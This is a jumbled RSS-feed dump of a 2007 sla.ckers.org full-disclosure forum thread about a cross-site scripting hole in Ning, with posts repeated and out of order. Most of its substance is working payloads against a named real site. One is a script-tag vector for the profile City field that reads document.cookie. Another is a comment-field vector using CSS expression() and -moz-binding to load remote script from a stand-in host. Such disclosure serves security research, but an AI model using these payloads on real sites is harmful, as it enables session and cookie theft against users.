Ning XSS hole PoC -> http://opensocialdemo.ning.com/profile/Suhail Image: My Profile -> Account -> City It's vulnerable in the City field with the vector "><script>alert(document.cookie);</script> Ning is supposed to be closing it in the next round of patches I believe. http://sla.ckers.org/forum/read.php?3,17281,17281#msg-17281 Mon, 20 May 2013 16:58:30 -0500 Phorum 5.2.15a http://sla.ckers.org/forum/read.php?3,17281,18565#msg-18565 Re: Ning XSS hole http://sla.ckers.org/forum/read.php?3,17281,18565#msg-18565
spacing comparison can likely uncover more, but i haven't the patience for that ^^

New Image:


-maluc]]> maluc Full Disclosure Sat, 22 Dec 2007 07:40:03 -0600 http://sla.ckers.org/forum/read.php?3,17281,18082#msg-18082 Re: Ning XSS hole http://sla.ckers.org/forum/read.php?3,17281,18082#msg-18082 This vector is what I came up with for comments (Mozilla and IE)... 
<a style="x:expression(document.body.firstChild.nextSibling.setAttribute('src','http://yoursite.com/XSS.js'));-moz-binding:url('http://yoursite.com/XSS.xml#xss')"></a>

-Dan]]> DoctorDan Full Disclosure Sun, 09 Dec 2007 14:34:00 -0600 http://sla.ckers.org/forum/read.php?3,17281,17494#msg-17494 Re: Ning XSS hole http://sla.ckers.org/forum/read.php?3,17281,17494#msg-17494 hackathology Full Disclosure Sun, 18 Nov 2007 06:50:00 -0600 http://sla.ckers.org/forum/read.php?3,17281,17281#msg-17281 Ning XSS hole http://sla.ckers.org/forum/read.php?3,17281,17281#msg-17281
Image:


My Profile -> Account -> City

It's vulnerable in the City field with the vector "><script>alert(document.cookie);</script>

Ning is supposed to be closing it in the next round of patches I believe.]]> Delixe Full Disclosure Fri, 09 Nov 2007 01:08:20 -0600